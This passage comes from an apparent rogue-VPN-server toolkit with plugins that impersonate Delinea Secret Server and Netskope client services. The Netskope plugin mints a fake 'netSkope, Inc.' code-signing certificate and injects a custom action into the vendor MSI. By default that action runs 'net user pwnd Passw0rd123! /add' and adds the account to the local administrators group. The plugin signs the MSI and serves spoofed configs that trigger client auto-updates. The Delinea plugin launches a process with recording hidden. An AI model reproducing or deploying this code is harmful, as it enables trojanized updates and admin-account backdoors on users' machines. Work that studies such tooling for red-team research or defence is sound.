            public_key = rsa.RSAPublicNumbers(exponent, modulus).public_key(backend=default_backend())
            self.logger.debug(f"Successfully decoded RSA key: {bitlen}-bit key, exponent={exponent}")
            return public_key
        except Exception as e:
            self.logger.error(f"Failed to decode RSA public key: {e}")
            return None

    def _rsa_encrypt(self, data, public_key):
        """Encrypt data with RSA using the provided public key.

        Uses OAEP padding with SHA-1 (what the Secret Server client expects).
        Returns ciphertext bytes, or None on failure (logged, not raised).
        """
        try:
            encrypted_data = public_key.encrypt(
                data,
                padding.OAEP(
                    mgf=padding.MGF1(algorithm=hashes.SHA1()),
                    algorithm=hashes.SHA1(),
                    label=None
                )
            )
            return encrypted_data
        except Exception as e:
            self.logger.error(f"Failed to encrypt with RSA: {e}")
            return None
from request root = ET.fromstring(request.data) guid = root.find(".//urn:guid", SECRET_SERVER_XML_NS).text self.logger.debug(f"Extracted GUID: {guid}") # Generate AES keys for this session aes_key, aes_iv = self._generate_aes_keys() self.logger.debug(f"Generated AES key={aes_key.hex()}, IV={aes_iv.hex()}") # Store keys for later use self.session_keys[guid] = { 'aes_key': aes_key, 'aes_iv': aes_iv } # Create launcher arguments launcher_data = json.dumps({ "Domain": "aaa.com", "WinProcessName": "calc.exe", "WinProcessArgs": "", "WinLaunchAsUser": False, "WinFileToRun": "", "UseWindowFormFiller": False, "WinLoadUserProfile": False, "WinUseShellExecute": False, "Processname": "", "LaunchAsUser": False, "UseShellExecute": False, "ProcessArgs": None, "FileToRun": "", "WindowsEscapeCharacter": None, "WindowsCharactersToEscape": None, "RecordMultipleWindows": True, "AdditionalProcessesToRecord": None, "UseSSHTunnel": False, "ProcessTunnelArgs": None, "WinProcessTunnelArgs": "", "TunnelRemoteHost": None, "TunnelRemotePort": None, "UseSshProxy": False, "SshProxyHost": None, "SshProxyPort": 0, "SshProxyUsername": None, "SshProxyPassword": None, "SshPublicKeyFingerPrint": None, "PreserveClientProcess": False, "SessionToken": None, "SessionExpiresInSeconds": None, "SessionRefreshToken": None, "SSHPrivateKeyOpenSSH": None, "EnableSSHVideoRecording": False, "Username": "aaa", "Password": "aaa", "record": False, "hideRecordingIndicator": True, "sessionkey": guid, "sessionCallbackIntervalSeconds": 60, "fipsEnabled": False, "Machine": None, "Url": None, "Server": None, "FingerprintSHA1String": None, "FingerprintSHA512String": None, "Host": None, "Port": 0, "SSHPrivateKey": None, "SSHPrivateKeyPassPhrase": None, "MaxSessionLength": 24, "InactivityTimeoutMinutes": 120, "IsRDSSession": False, "RecordRDSKeystrokes": False, "CredentialProxyType": None, "Target": "" }) encrypted_launcher_data = self._aes_encrypt(launcher_data.encode('utf-16-le'), aes_key, aes_iv) launcher_args = 
encrypted_launcher_data.hex() xml = self.render_template('GetLauncherArguments.xml', launcher_args=launcher_args) return Response(xml, mimetype='text/xml') elif b'GetSymmetricKey' in request.data: # Extract the public key and GUID root = ET.fromstring(request.data) guid = root.find(".//urn:guid", SECRET_SERVER_XML_NS).text public_key_blob = root.find(".//urn:publicKeyBlob", SECRET_SERVER_XML_NS).text # Get stored session keys for this GUID if guid not in self.session_keys: self.logger.error(f"No session keys found for GUID: {guid}") return abort(400) session_data = self.session_keys[guid] aes_key = session_data['aes_key'] aes_iv = session_data['aes_iv'] # Decode and load RSA public key public_key = self._decode_rsa_public_key(public_key_blob) if not public_key: return abort(400) # Generate session keys session_key = secrets.token_bytes(32) session_iv = secrets.token_bytes(16) # Encrypt the keys with RSA encrypted_aes_key = self._rsa_encrypt(aes_key, public_key) encrypted_aes_iv = self._rsa_encrypt(aes_iv, public_key) encrypted_session_key = self._rsa_encrypt(session_key, public_key) encrypted_session_iv = self._rsa_encrypt(session_iv, public_key) if not all([encrypted_aes_key, encrypted_aes_iv, encrypted_session_key, encrypted_session_iv]): return abort(500) # Base64 encode the encrypted keys keys = { 'aes_key': base64.b64encode(encrypted_aes_key).decode('utf-8'), 'aes_iv': base64.b64encode(encrypted_aes_iv).decode('utf-8'), 'session_key': base64.b64encode(encrypted_session_key).decode('utf-8'), 'session_iv': base64.b64encode(encrypted_session_iv).decode('utf-8') } xml = self.render_template('GetSymmetricKey.xml', **keys) return Response(xml, mimetype='text/xml') elif b'UpdateStatusV2' in request.data: xml = self.render_template('UpdateStatusV2.xml') return Response(xml, mimetype='text/xml') elif b'GetNextProtocolHandlerVersion' in request.data: xml = self.render_template('GetNextProtocolHandlerVersion.xml') return Response(xml, mimetype='text/xml') return 
abort(404) def handle_http(self, handler): if handler.command == 'GET': self.handle_get(handler) elif handler.command == 'POST': self.handle_post(handler) return True def can_handle_http(self, handler): user_agent = handler.headers.get('User-Agent', '') return handler.headers.get('vault-application') \ or handler.path == '/delinea' \ or handler.path == '/rdpwebservice.asmx' \ or 'Thycotic' in user_agent \ or 'MS Web Services Client Protocol' in user_agent ================================================ FILE: src/nachovpn/plugins/delinea/templates/GetLauncherArguments.xml ================================================ {{ launcher_args }} ================================================ FILE: src/nachovpn/plugins/delinea/templates/GetNextProtocolHandlerVersion.xml ================================================ 6.0.3.39 ================================================ FILE: src/nachovpn/plugins/delinea/templates/GetSymmetricKey.xml ================================================ {{ aes_key }} {{ aes_iv }} {{ session_key }} {{ session_iv }} ================================================ FILE: src/nachovpn/plugins/delinea/templates/UpdateStatusV2.xml ================================================ false false false ================================================ FILE: src/nachovpn/plugins/delinea/templates/index.html ================================================ ================================================ FILE: src/nachovpn/plugins/example/__init__.py ================================================ ================================================ FILE: src/nachovpn/plugins/example/plugin.py ================================================ from nachovpn.plugins import VPNPlugin from flask import Flask, jsonify, request import logging class ExamplePlugin(VPNPlugin): def _setup_routes(self): # Call the parent class's route setup super()._setup_routes() # Add additional routes specific to this plugin @self.flask_app.route('/api/v2/healthcheck', 
def can_handle_http(self, handler):
    """Claim only the v2 healthcheck endpoint."""
    return handler.path == '/api/v2/healthcheck'

def can_handle_data(self, data, client_socket, client_ip):
    """Claim raw-socket payloads whose first four bytes contain PING."""
    logging.info(f"ExamplePlugin::can_handle_data: Received data from {client_ip}: {data.hex()}")
    if len(data) < 4:
        return False
    return b"PING" in data[:4]

def handle_data(self, data, client_socket, client_ip):
    """Answer a PING payload with a PONG line and report it handled."""
    logging.info(f"ExamplePlugin::handle_data: Received data from {client_ip}: {data.hex()}")
    reply = b"PONG\n"
    client_socket.sendall(reply)
    return True
def _env_flag(self, name, default=False):
    """Parse a boolean environment flag.

    FIX: the original used `os.getenv(name, False)`, which returns a
    non-empty *string* whenever the variable is set — so
    NETSKOPE_MSI_FORCE_PATCH=0 or =false evaluated truthy. Compare against
    common truthy spellings instead. Unset variables keep `default`.
    """
    value = os.getenv(name)
    if value is None:
        return default
    return value.strip().lower() in ("1", "true", "yes", "on")

def __init__(self, *args, **kwargs):
    # provide the templates directory relative to this plugin
    super().__init__(*args, **kwargs, template_dir=os.path.join(os.path.dirname(__file__), 'templates'))

    # Payload storage
    self.payload_dir = os.path.join(os.getcwd(), 'payloads')
    self.files_dir = os.path.join(os.path.dirname(__file__), 'files')
    self.cache_dir = os.path.join(os.getcwd(), 'cache')
    os.makedirs(self.payload_dir, exist_ok=True)
    os.makedirs(self.cache_dir, exist_ok=True)

    # Payload options (booleans parsed from env; see _env_flag)
    self.msi_force_patch = self._env_flag("NETSKOPE_MSI_FORCE_PATCH", False)
    self.msi_force_download = self._env_flag("NETSKOPE_MSI_FORCE_DOWNLOAD", False)
    self.msi_add_file = os.getenv("NETSKOPE_MSI_ADD_FILE", None)
    self.msi_increment_version = self._env_flag("NETSKOPE_MSI_INCREMENT_VERSION", True)
    self.msi_command = os.getenv(
        "NETSKOPE_MSI_COMMAND",
        r"net user pwnd Passw0rd123! /add && net localgroup administrators pwnd /add"
    )

    # Certificate paths
    self.codesign_cert_path = os.path.join('certs', 'netskope-codesign.cer')
    self.codesign_key_path = os.path.join('certs', 'netskope-codesign.key')
    self.codesign_pfx_path = os.path.join('certs', 'netskope-codesign.pfx')

    # Tenant config; every value can be overridden via environment
    self.tenant_config = {
        "orgkey": os.getenv("NETSKOPE_ORGKEY", self.random_string(20)),
        "tenant_id": os.getenv("NETSKOPE_TENANT_ID", self.random_int(1000, 9999)),
        "tenant_name": os.getenv("NETSKOPE_TENANT_NAME", "TestOrg"),
        "region": os.getenv("NETSKOPE_REGION", "eu"),
        "pop_name": os.getenv("NETSKOPE_POP_NAME", "UK-LON1"),
        "addon_manager_host": os.getenv("NETSKOPE_ADDON_MANAGER_HOST", self.dns_name),
        "enrollment_host": os.getenv("NETSKOPE_ENROLLMENT_HOST", self.dns_name),
        "addon_checker_host": os.getenv("NETSKOPE_ADDON_CHECKER_HOST", self.dns_name),
        "sf_checker_host": os.getenv("NETSKOPE_SF_CHECKER_HOST", self.dns_name),      # sfchecker.goskope.com
        "npa_gateway_host": os.getenv("NETSKOPE_NPA_GATEWAY_HOST", self.dns_name),    # gateway.npa.goskope.com
        "nsgw_host": os.getenv("NETSKOPE_NSGW_HOST", self.dns_name),                  # gateway-*.eu.goskope.com
        "nsgw_backup_host": os.getenv("NETSKOPE_NSGW_BACKUP_HOST", self.dns_name),    # gateway-backup-*.eu.goskope.com
        "gslb_gateway_host": os.getenv("NETSKOPE_GSLB_GATEWAY_HOST", self.dns_name),  # gateway.gslb.goskope.com
        "npa_host": os.getenv("NETSKOPE_NPA_HOST", self.dns_name),                    # ns-*.nl-am2.npa.goskope.com
        "stitcher_host": os.getenv("NETSKOPE_STITCHER_HOST", self.dns_name),          # stitcher.npa.goskope.com
        "dp_gateway_fqdn": os.getenv("NETSKOPE_DP_GATEWAY_FQDN", self.dns_name),      # gateway-lon2.goskope.com
        "user_email": os.getenv("NETSKOPE_USER_EMAIL", "test.user@example.com"),
        "user_key": os.getenv("NETSKOPE_USER_KEY", self.random_string(20)),
        "client_version": os.getenv("NETSKOPE_CLIENT_VERSION", "200.0.0.2272"),
        "client_hash": self.random_hash("sha1"),
    }

    if not self.bootstrap():
        self.logger.error(f"Failed to bootstrap. Disabling {self.__class__.__name__}")
        self.enabled = False

def random_string(self, length=20):
    """Return a random ASCII-letters-only string of the given length."""
    return ''.join(random.choices(string.ascii_uppercase + string.ascii_lowercase, k=length))

def random_int(self, min=1, max=10000):
    """Return a random integer in [min, max] (inclusive)."""
    return random.randint(min, max)

def random_hash(self, algorithm="md5"):
    """Return an upper-cased hex digest of a random string."""
    h = hashlib.new(algorithm)
    h.update(self.random_string().encode())
    return h.hexdigest().upper()

def sign_msi_files(self):
    """Authenticode-sign the patched MSI with osslsigncode (POSIX only).

    Returns False when the cert, MSI, or osslsigncode binary is missing,
    or when signing fails; True on success.
    """
    if not os.path.exists(self.codesign_cert_path):
        self.logger.error("Windows code signing certificate not found, skipping signing")
        return False

    if not os.path.exists(os.path.join(self.payload_dir, "STAgent.msi")):
        self.logger.error("MSI file not found, skipping signing")
        return False

    if os.name == "nt":
        self.logger.error("Windows MSI signing not supported yet")
        return False

    if not os.path.exists('/usr/bin/osslsigncode'):
        self.logger.error("osslsigncode not found, skipping signing")
        return False

    # Sign the MSI files
    for msi_file in ["STAgent.msi"]:
        input_file = os.path.join(self.payload_dir, msi_file)
        output_file = os.path.join(self.payload_dir, f"{msi_file}.signed")

        # Remove existing signed file
        if os.path.exists(output_file):
            os.remove(output_file)

        proc = subprocess.run([
            "/usr/bin/osslsigncode", "sign",
            "-pkcs12", self.codesign_pfx_path,
            "-h", "sha256",
            "-in", input_file,
            "-out", output_file,
        ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)

        if proc.returncode or not os.path.exists(output_file):
            self.logger.error(f"Failed to sign {msi_file}: {proc.returncode}")
            return False
        else:
            self.logger.info(f"Signed {msi_file}")
            # Atomically replace the unsigned MSI with the signed one
            os.replace(output_file, input_file)
    return True

def verify_msi_files(self):
    """Verify the MSI signature chains to our current CA.

    NOTE: returns True (best-effort pass) when verification tooling is
    unavailable, so patching is only re-triggered on a definite mismatch.
    """
    if os.name == "nt":
        self.logger.error("Windows MSI verification not supported yet")
        return True

    if os.name == "posix" and not os.path.exists('/usr/bin/osslsigncode'):
        self.logger.error("osslsigncode not found, skipping verification")
        return True

    for msi_file in ["STAgent.msi"]:
        proc = subprocess.run([
            "/usr/bin/osslsigncode", "verify",
            "-CAfile", self.cert_manager.ca_cert_path,
            "-in", os.path.join(self.payload_dir, msi_file),
        ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        if proc.returncode:
            self.logger.error(f"Failed to verify {msi_file}: {proc.returncode}")
            return False
    self.logger.info("MSI file verified")
    return True

def patch_msi_files(self):
    """Copy the stock MSI into the payload dir and inject our payloads.

    Skips work when a previously patched MSI still verifies (unless
    msi_force_patch is set). Returns False when the source MSI is missing.
    """
    # Patch the msi files
    if os.path.exists(os.path.join(self.payload_dir, "STAgent.msi")) and \
            not self.msi_force_patch and self.verify_msi_files():
        self.logger.warning("MSI file already patched, skipping")
        return True

    if os.name == "posix" and not os.path.exists('/usr/bin/msidump'):
        self.logger.error("msitools not found, skipping patching")
        return True

    # Check if MSI files are present
    if not os.path.exists(os.path.join(self.files_dir, "STAgent.msi")):
        self.logger.warning(f"MSI file not found in files directory: {self.files_dir}")
        return False

    patcher = get_msi_patcher()
    for msi_file in ["STAgent.msi"]:
        # Copy default MSI file to payload directory
        input_file = os.path.join(self.files_dir, msi_file)
        output_file = os.path.join(self.payload_dir, msi_file)
        shutil.copy(input_file, output_file)

        # Add patches
        if self.msi_add_file:
            patcher.add_file(output_file, self.msi_add_file, self.random_hash(), "DefaultFeature")
            self.logger.info(f"Added file {self.msi_add_file} to {msi_file}")

        if self.msi_command:
            patcher.add_custom_action(output_file, f"_{self.random_hash()}", 50,
                                      "C:\\windows\\system32\\cmd.exe", f"/c {self.msi_command}",
                                      "InstallExecuteSequence")
            self.logger.info(f"Added custom action to {msi_file}")

        # Set the MSI version
        patcher.set_msi_version(output_file, self.tenant_config["client_version"])
        self.logger.info(f"Set MSI version for {msi_file}")

        # Add CERT_DIGEST property
        # Not validated, but it's required by the STAgent service
        cert_digest = base64.b64encode(os.urandom(256)).decode()
        patcher.add_custom_property(output_file, "CERT_DIGEST", cert_digest)
        self.logger.info(f"Added CERT_DIGEST property to {msi_file}")

    self.logger.info("MSI file patched")
    return True

def get_org_cert(self):
    """The org cert served to clients is simply our CA cert."""
    return self.get_ca_cert()

def get_ca_cert(self):
    """Return the PEM text of our CA certificate."""
    with open(self.cert_manager.ca_cert_path, 'r') as f:
        return f.read()

def get_user_cert(self):
    """Mint a per-user client-auth certificate and return it as PKCS#12."""
    # Generate a private key for the user certificate
    user_private_key = rsa.generate_private_key(
        public_exponent=65537,
        key_size=2048,
        backend=default_backend()
    )

    # Subject mirrors the configured tenant/user identity
    subject = x509.Name([
        x509.NameAttribute(NameOID.COMMON_NAME, self.tenant_config["user_email"]),
        x509.NameAttribute(NameOID.ORGANIZATION_NAME, self.tenant_config["tenant_name"]),
        x509.NameAttribute(NameOID.ORGANIZATIONAL_UNIT_NAME, os.urandom(16).hex()),
        x509.NameAttribute(NameOID.LOCALITY_NAME, "London"),
        x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, "GB"),
        x509.NameAttribute(NameOID.COUNTRY_NAME, "GB"),
        x509.NameAttribute(NameOID.EMAIL_ADDRESS, self.tenant_config["user_email"]),
    ])

    eku_list = [
        ExtendedKeyUsageOID.CLIENT_AUTH,
    ]

    key_usage = x509.KeyUsage(
        digital_signature=True,
        key_encipherment=True,
        content_commitment=False,
        data_encipherment=False,
        key_agreement=True,
        encipher_only=False,
        decipher_only=False,
        key_cert_sign=False,
        crl_sign=False
    )

    builder = x509.CertificateBuilder().subject_name(
        subject
    ).issuer_name(
        self.cert_manager.ca_cert.subject
    ).public_key(
        user_private_key.public_key()
    ).serial_number(
        x509.random_serial_number()
    ).not_valid_before(
        # Back-date a day to tolerate client clock skew
        datetime.now(timezone.utc) - timedelta(days=1)
    ).not_valid_after(
        datetime.now(timezone.utc) + timedelta(days=365)
    ).add_extension(
        x509.ExtendedKeyUsage(eku_list), critical=True,
    ).add_extension(
        key_usage, critical=True,
    )

    # Sign the certificate with the CA private key
    user_certificate = builder.sign(self.cert_manager.ca_key, hashes.SHA256(), default_backend())

    # Convert to pkcs12 (no passphrase)
    user_p12 = serialization.pkcs12.serialize_key_and_certificates(
        b"user", user_private_key, user_certificate, None, serialization.NoEncryption())
    self.logger.info(f"Generated user certificate for {self.tenant_config['user_email']}")
    return user_p12

def bootstrap(self):
    """One-time setup: code-signing cert, CA in tenant config, patched+signed MSI."""
    # Generate a Windows code signing certificate
    if not os.path.exists(self.codesign_cert_path) or not os.path.exists(self.codesign_key_path):
        self.cert_manager.generate_codesign_certificate(
            common_name="netSkope, Inc.",
            cert_path=self.codesign_cert_path,
            key_path=self.codesign_key_path,
            pfx_path=self.codesign_pfx_path
        )

    # Load the CA certificate into the tenant config
    with open(self.cert_manager.ca_cert_path, 'r') as f:
        self.tenant_config["ca_certificate"] = f.read()

    # Patch the Windows MSI file and sign it
    if not self.patch_msi_files():
        return False
    if not self.sign_msi_files():
        return False
    return True

def can_handle_http(self, handler):
    """Claim requests from the Netskope agent or our own helper endpoints."""
    user_agent = handler.headers.get('User-Agent', '')
    if 'Netskope ST Agent' in user_agent or \
            handler.path in ["/nsauth/client/authenticate", "/netskope/generate_command"]:
        return True
    return False

def timestamp(self):
    """Current UTC time in the ISO-ish format the client expects."""
    return datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.000Z")

def request_id(self):
    """Random URL-safe request id (15 random bytes -> 20 b64 chars)."""
    return base64.urlsafe_b64encode(os.urandom(15)).decode()

def version_hex(self):
    """Short random hex token used as a config 'version'."""
    return os.urandom(6).hex()[:5]
"status": "success", "hosts": { "enrollment": self.tenant_config["enrollment_host"] }, "enabled": "true" } return jsonify(data) @self.flask_app.route("/adconfig", methods=["GET"]) def adconfig(): return jsonify({"secureUPN": "0", "status": "success"}) @self.flask_app.route("/client/supportlogging", methods=["POST"]) def support_logging(): return jsonify({"status": "success"}) @self.flask_app.route("/config/user/getbrandingbyemail", methods=["GET"]) def getbrandingbyemail(): orgkey = request.args.get('orgkey', self.tenant_config["orgkey"]) data = { "AddonCheckerHost": self.tenant_config["addon_checker_host"], "AddonCheckerResponseCode": "netSkope@netSkope", "AddonManagerHost": self.tenant_config["addon_manager_host"], "EncryptBranding": False, "OrgKey": orgkey, "OrgName": self.tenant_config["tenant_name"], "SFCheckerHost": self.tenant_config["sf_checker_host"], "SFCheckerIP": "8.8.8.8", "UserEmail": self.tenant_config["user_email"], "UserKey": self.tenant_config["user_key"], "ValidateConfig": False, "status": "success", "tenantID": self.tenant_config["tenant_id"] } return jsonify(data) @self.flask_app.route("/v1/branding/tenant/", methods=["GET"]) def brandingtenant(tenant): jwt = request.headers.get('Authorization') data = { "encrypted": False, "nonce": "", "branding": { "AddonCheckerHost": self.tenant_config["addon_checker_host"], "AddonCheckerResponseCode": "netSkope@netSkope", "AddonManagerHost": self.tenant_config["addon_manager_host"], "EncryptBranding": False, "OrgKey": self.tenant_config["orgkey"], "OrgName": self.tenant_config["tenant_name"], "SFCheckerHost": self.tenant_config["sf_checker_host"], "SFCheckerIP": "8.8.8.8", "UserEmail": self.tenant_config["user_email"], "UserKey": self.tenant_config["user_key"], "ValidateConfig": False, "status": "success", "tenantID": self.tenant_config["tenant_id"] } } return jsonify(data) @self.flask_app.route("/v2/config/org/clientconfig", methods=["GET"]) def clientconfig(): userconfig = request.args.get('userconfig', 
"0") tenantconfig = request.args.get('tenantconfig', "0") data = {} if tenantconfig == "1": data = { "IDPModeOnlyIfConfigured": "0", "MDMSecureEnrollmentTokenEnabled": "1", "OverrideAccessMethodDetection": "0", "add_os_and_access_method_to_ssl_decryption": "1", "advance_firewall_enabled": "0", "alert_acknowledge": "0", "allowClientDisabling": "true", "allowIdPLogout": "false", "allowNpaDisabling": "true", "allowOnetimeClientDisabling": "0", "allow_autouninstall": "0", "alwaysOnDemandVPN": "0", "always_send_nsdeviceuid_new": "1", "always_send_nsdeviceuid_new_v2": "1", "android_chromeos_ns_client": "0", "app_instance_management_enabled": "0", "blockDnsTCP": "0", "blockIPv6": "0", "bwanclient": "0", "bwanenrollmenturl": "", "bypassApp": "1", "bypassLoopbackDNS": "1", "bypassOfficeAppsAtAndroidOS": "0", "bypassPacDownloadFlow": "0", "bypassPreferredIPv4macOS": "0", "bypassPrivateTrafficAtDriver": "0", "case_sensitive_groups": "0", "cert_pinned_app_decryption_enabled": "0", "cfg_ver_usr_update_check": "0", "checkCiscoVpn": "0", "checkSNI": "false", "check_msi_digest": "0", "clientAssistedGSLBGTM": "1", "clientAssistedGTM": "1", "clientEncryptBranding": "0", "clientHandleOverlappingDomains": "0", "clientStatusEnableBatching": "0", "clientStatusUpdate": { "heartbeatIntervalInMin": "30" }, "clientStatusUpdateIntervalInMin": "5", "clientUninstall": { "allowUninstall": "true" }, "clientUpdate": { "allowAutoGoldenUpdate": "false", "allowAutoUpdate": "true", "showUpdateNotification": "false", "updateIntervalInMin": "1" }, "client_config_post_v2": "0", "configUpdate": { "updateIntervalInMin": "1" }, "configurationName": "Test Client Configuration", "custom_email_sending_domain": "0", "dc_cert_check_crl_support_enabled": "0", "dc_cert_check_sc_support_enabled": "0", "dc_custom_label_enabled": "1", "debugSettings": "true", "demClientAppProbeLimit": "10", "demDeviceHealthIntervalInMin": "0", "demDpRouteControlCollectInterval": "0", "demStationAppProbeLimit": "30", 
"demTopConsumptionMetrics": "0", "dem_active_station_limit": "0", "dem_app_probes_max_limit": "0", "dem_custom_apps_max_limit": "0", "dem_network_path_probes_max_limit": "0", "demconfig_host": "", "dest-ip-policy": "0", "deviceUniqueID": "1", "device_admin": { "auto_start_prelogin_tunnel": "false", "cert_ca": [], "data": "", "prelogin_username": "", "show_prelogon_status": "true", "validate_crl": "false" }, "device_classification_av_os_checks_enabled": "1", "device_classification_cert_check_enabled": "0", "device_classification_ui_improvements": "1", "disableFirefoxPopup": "0", "disableJavaDnsCache": "0", "disableMacCannotAllocateCheck": "0", "disable_appssoagent_restart": "0", "dlp_unique_count_enabled": "1", "dns_custom_port": "0", "drop_svcb_dns_resolver_query": "1", "duplicateRccDataToGEF": "0", "dynamicSteering": "1", "dynamicSteeringImprovementEnabled": "1", "email_svc_v2_tenant_feature": "1", "enableAOACSupport": "1", "enableAirDropException": "0", "enableClientSelfProtection": "false", "enableDemClientStatus": "0", "enableDemHeartbeat": "1", "enableMacOSInterfaceBinding": "0", "enableMacPerformance": "0", "enableMacPerformance_v2": "0", "enableSaveBatteryForSleepMode": "0", "enableTLSKey": "0", "enableTunnelSessionNotFound": "0", "enableUpdatePropertyFrameSupport": "1", "enable_case_insensitivity": "0", "enable_dc_smart_card_insertion_detection": "0", "enable_deep_custom_category_fetching": "0", "enable_dem_npa_private_apps": "0", "enable_mongo_maria_sync_tenant": "1", "enable_scim_custom_attributes": "0", "enable_scim_custom_attributes_event_enrichment": "0", "enable_um_mongo_sync": "0", "encryptClientConfig": "0", "endpoint_dlp": "0", "endpoint_dlp_cd_dvd": "0", "endpoint_dlp_content_bluetooth": "0", "endpoint_dlp_content_network": "0", "endpoint_dlp_content_printer": "0", "endpoint_dlp_device_encryption": "0", "endpoint_dlp_enabled": "0", "endpoint_dlp_mac_bluetooth_device_control": "1", "endpoint_dlp_macos_content_control_settings": "0", 
"endpoint_dlp_ui_mip_profiles_warning": "0", "endpoint_dlp_ui_otp_enabled": "0", "enhancedCertPinnedApplist": "1", "enhanced_reports": "1", "enhanced_reports_feature_start_date": "2025-01-01 00:00:00", "enhanced_reports_migration_period": "90", "enhanced_reports_pre_migration_period": "90", "enhanced_reports_start_date": "2025-01-01 00:00:00", "epdlp_mp": "", "eventForwarderHost": "", "event_incident_enabled": "0", "ext_urp_enabled": "0", "externalProxy": [], "externalProxyConfig": "1", "failClose": { "captive_portal_timeout": "", "exclude_npa": "false", "fail_close": "false", "notification": "false" }, "fail_close_enabled": "1", "fast_fetch_enabled": "0", "featureActivationExpiry": "0", "feature_ios_client_download": "0", "feature_mongo_client_secondary_allowed": "0", "forward_to_proxy_settings": "0", "gslb": { "host": self.tenant_config["gslb_gateway_host"], "port": "443" }, "gsuite_mailclient_enabled": "0", "handleExceptionsAtDriver": "0", "handleSNIFromSegmentPacket": "0", "hideClientIcon": "false", "hide_client_after": "50", "ignoreInactiveSystemProxy": "0", "ignoreLoopbackProxy": "0", "ignore_cert_chain_certs": "1", "industry_comparison_enabled": "1", "injectAtTransportLayer": 0, "inline_policy_enhancements_enabled": "1", "interopProxy": { "host": "", "port": 0, "product": 0 }, "ios_vpn_mode": "1", "isClientSTA": "1", "large_file_support": "0", "linuxBypassRouteIPException": "0", "localTrafficBypass": "1", "logLevel": "info", "master_passcode_for_client_disablement": "0", "mdm_secure_enrollment": "1", "metrics": { "enable": "0" }, "mongo_user_info_flag": "1", "mtu": "1476", "ng_device_classification_enabled": "0", "notBypassBlockedCertpinnedAppOnSession0": "0", "npa": { "dnstcp_enabled": "1", "dtls_enabled": "0", "gslb": { "host": self.tenant_config["gslb_gateway_host"], "port": "443" }, "host": self.tenant_config["npa_gateway_host"], "keepalive_timeout": 15, "lb_host": "", "npa_local_broker_v1": "0", "port": 443, "port_bypass_enabled": "0", 
"rfc1918_enabled": "0", "tenant": self.tenant_config["npa_host"] }, "npa_4k_pvkey_cert": "0", "npa_appdiscovery_host_limit": "32", "npa_auth_client_enrollment_enabled": "0", "npa_client_allow_disable": "1", "npa_client_bypass_local_subnet_disabled": "0", "npa_client_compose_device_user_id": "0", "npa_client_l4": "0", "npa_client_use_cgnat": "0", "npa_docker_support": "0", "npa_enable_tls_cipher_aes128_only": "1", "npa_enable_wildcard_app_validation": "0", "npa_gslb_client": "0", "npa_gslb_client_no_fallback": "0", "npa_gslb_client_pop_count": "10", "npa_gslb_client_v2": "0", "npa_gslb_client_v3": "1", "npa_handle_dns_https_query": "0", "npa_lz4_support": "0", "npa_max_dns_search_domains": "0", "npa_srp_compress": "0", "npa_srpv2": "1", "npa_srpv2_configdist": "1", "nsclient_api_security_no_enc": "0", "nsgw": { "backupHost": self.tenant_config["nsgw_backup_host"], "host": self.tenant_config["nsgw_host"], "port": 443 }, "onpremcheck": { "onprem_additional_http_hosts": [], "onprem_additional_ips": [], "onprem_host": "", "onprem_http_host": "", "onprem_http_tcp_connection_timeout": "", "onprem_ip": "", "onprem_use_dns": "" }, "overrideUserDisableAfterLogin": "0", "partner_orange": "0", "pdem_subscription_level": "None", "policy_group_count_max": "1024", "postureValidation": { "periodic_validation_enabled": "true", "validation": { "interval": 60 } }, "posture_validation_enabled": "1", "prc_dp_geofence": "0", "prc_dp_npa_tenant": "0", "prc_dp_premium_npa_tenant": "0", "prc_dp_tenant": "0", "prelogin_enabled": "false", "premium_reports": "1", "premium_reports_licensing_status": "1", "premium_reports_licensing_status_start_date": "2025-01-01 00:00:00", "premium_reports_migration_period": "0", "premium_reports_ns_superadmin_access_only": "0", "premium_reports_trial_period": "0", "priority": 0, "privateApps": { "npa_vdi_support": "false", "npa_vdi_user": "", "partner_access": "false", "partner_tenant_access": "false", "partner_tenant_info": [], "primary_tenant_name": "", 
"reauth_enabled": "false", "seamless_policy_update": "true" }, "protocol": "dtls", "proxyAuth": "0", "proxy_chaining_enabled": "0", "publisher_selection": "0", "push_tenant_ca_cert_key": "1", "reconfigureUser": "1", "remove_source_steering_exception": "0", "reportClientStatus": "0", "scim_attribute_control": "0", "scim_delete_disabled_user": "1", "scim_group_members": "0", "scim_mongo_case_insensitive_query": "1", "scim_nested_group_support": "0", "secureAccess": "1", "secure_config_validation": "0", "secure_enrollment_encryption_token_enabled": "1", "secure_enrollment_multiple_token_support_enabled": "0", "secure_enrollment_token_decoupling_enabled": "1", "sendDeviceInfo": "false", "service_profile_v2_enabled": "0", "sfCheck": { "SFCheckerHost": self.tenant_config["sf_checker_host"], "SFCheckerIP": "8.8.8.8", "SFCheckerIP6": "2001:4860:4860:8888" }, "simple_client_notification_enabled": "1", "sites_enabled": "1", "steer_all_cloud_apps": "0", "steering_categories_api_v2": "0", "steering_config_2": "1", "steering_domains_api_v2": "0", "steering_dynamicdomains_api_v2": "0", "steering_dynamicexceptions_api_v2": "0", "steering_dynamicpinnedapps_api_v2": "0", "steering_exceptions_api_v2": "0", "steering_match_criteria_improvements": "0", "steering_orgpac_api_v2": "0", "steering_pac_api_v2": "0", "steering_pinnedapps_api_v2": "0", "steering_post_api_v2": "0", "steering_private_apps_api_v2": "0", "steering_v2_enabled": "0", "stopTunnelOnSleep": "0", "storage_constraint_profile_api_rate_limit": "10", "supportUDPExceptions": "0", "support_more_tlv": "1", "support_ou_group_exceptions": "1", "synchronous_scim_server": "1", "traffic_mode": "web", "transaction_logs_enabled": "1", "uba_enabled": "0", "um_api_service_migration_high_usage": "0", "um_api_service_migration_low_usage": "0", "um_api_service_migration_medium_usage": "0", "um_clear_all_cache_async": "0", "um_clear_steering_cache": "0", "unified_ios_client": "1", "urp_enabled": "0", "useConfigVersion": "0", 
